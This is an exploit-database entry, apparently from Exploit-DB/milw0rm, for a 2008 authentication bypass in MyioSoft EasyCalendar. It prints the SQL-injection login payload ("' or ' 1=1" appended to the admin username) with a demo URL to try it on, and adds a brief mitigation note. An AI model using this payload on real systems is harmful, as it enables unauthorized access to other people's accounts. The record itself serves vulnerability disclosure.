header-logo
Suggest Exploit
vendor:
EasyCalendar
by:
ZoRLu
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: EasyCalendar
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MyioSoft EasyCalendar Remote Auth Bypass Vulnerability

A vulnerability in MyioSoft EasyCalendar allows an attacker to bypass authentication by using the username [real_admin_name] ' or ' 1=1 and the password ZoRLu. Generally, the admin name is 'admin'. A demo of the exploit can be found at http://myiosoft.com/products/EasyCalendar/demo/ with the username demo1 ' or ' 1=1 and the password ZoRLu.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly sanitized.
Source

Exploit-DB raw data:

[~] MyioSoft EasyCalendar Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 07.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] -----------------------------------------------------------

Exploit:

username: [real_admin_name] ' or ' 1=1  ( you must know admin_name )

password: ZoRLu

note: generally admin name: admin


admin login for demo:

http://myiosoft.com/products/EasyCalendar/demo/


example for demo:

admin: demo1 ' or ' 1=1

passwd: ZoRLu

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-07]